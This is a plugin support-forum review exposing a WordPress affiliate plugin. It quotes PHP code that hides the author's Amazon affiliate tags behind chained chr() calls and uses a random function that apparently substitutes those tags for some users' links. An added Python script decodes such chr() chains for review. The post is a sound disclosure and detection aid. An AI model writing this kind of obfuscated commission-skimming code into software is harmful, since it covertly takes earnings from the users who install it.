Support » Plugin: No API Amazon Affiliate » Scam, vulnerable code! Read description! Don’t install!

  • pandaqr

    (@pandaqr)


    Their Amazon affiliate ID is pwpnaaa0f-20. They use a hacking code in their plugin's includes/naaa-functions.php file. You cannot find their ID because they are using the PHP chr() function, using the octal value to add the ASCII character. Here is the code.

    function naaa_get_gat($market){
    	$market = strtolower($market);
    	if ($market == 'ca'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(102).chr(45).chr(50).chr(48));
    	}else if ($market == 'de'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(45).chr(50).chr(49));
    	}else if ($market == 'es' || empty($market)){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(55).chr(45).chr(50).chr(49));
    	}else if ($market == 'fr'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(50).chr(45).chr(50).chr(49));
    	}else if ($market == 'gb'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(57).chr(45).chr(50).chr(49));
    	}else if ($market == 'it'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(102).chr(45).chr(50).chr(49));
    	}else if ($market == 'jp'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(45).chr(50).chr(50));
    	}else if ($market == 'us'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(99).chr(45).chr(50).chr(48));
    	}else if ($market == 'mx'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(53).chr(45).chr(50).chr(48));
    	}else if ($market == 'br'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(51).chr(45).chr(50).chr(48));
    	}
    	return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(55).chr(45).chr(50).chr(49));
    }
    

    Also, they are using a random function to add their affiliate ID to your products.

    function naaa_get_finalist($first, $second){
    	if (random_int(1, 100) > 7){
    		return $first;
    	}else{
    		return $second;
    	}
    }

    Hope this message would help to avoid such scammers.

    Be safe.
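An added example, not part of the original review or the plugin's code: a static check in Python that finds chains of `chr()` calls in PHP source and decodes them, so a string hidden the way the quoted function hides it shows up in a plain-text review. The sample input is constructed from two branches of the quoted function, and the tag-shape pattern is an assumption about how affiliate tags look.

```python
import re

# Constructed sample: two branches copied from the function quoted in the post,
# plus a single chr() call that must not be reported.
SAMPLE_PHP = r"""
function naaa_get_gat($market){
    $market = strtolower($market);
    if ($market == 'ca'){
        return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(102).chr(45).chr(50).chr(48));
    }else if ($market == 'de'){
        return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(45).chr(50).chr(49));
    }
    $sep = chr(10);
}
"""

# One chr() call with a literal argument: decimal, 0x hex, or leading-0 octal.
CHR_CALL = r"chr\(\s*(0[xX][0-9a-fA-F]+|\d+)\s*\)"
# Three or more chr() calls joined by PHP's "." concatenation operator.
CHR_CHAIN = re.compile(rf"{CHR_CALL}(?:\s*\.\s*{CHR_CALL}){{2,}}", re.IGNORECASE)
# Assumption: an affiliate tag looks like "<name>-NN", as in the tag named in the post.
TAG_SHAPE = re.compile(r"^[a-z0-9]+-\d{2}$")

def php_int(lit):
    """Parse an integer literal the way PHP reads it (hex, octal, decimal)."""
    if lit.lower().startswith("0x"):
        return int(lit, 16)
    if len(lit) > 1 and lit.startswith("0"):
        return int(lit, 8)
    return int(lit)

def find_chr_strings(source):
    """Return (line, decoded_text, looks_like_tag) for each chr() chain found."""
    findings = []
    for m in CHR_CHAIN.finditer(source):
        try:
            args = re.findall(CHR_CALL, m.group(0), re.IGNORECASE)
            codes = [php_int(a) % 256 for a in args]  # chr() wraps modulo 256
        except ValueError:
            continue  # malformed literal such as "09"; PHP would reject it too
        text = bytes(codes).decode("latin-1")
        line = source.count("\n", 0, m.start()) + 1
        findings.append((line, text, bool(TAG_SHAPE.match(text))))
    return findings

if __name__ == "__main__":
    for line, text, is_tag in find_chr_strings(SAMPLE_PHP):
        print(f"line {line}: {text!r} tag-shaped={is_tag}")
```

Running the same function over every `.php` file in a plugin directory before installation gives a short list of decoded strings to read by eye.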
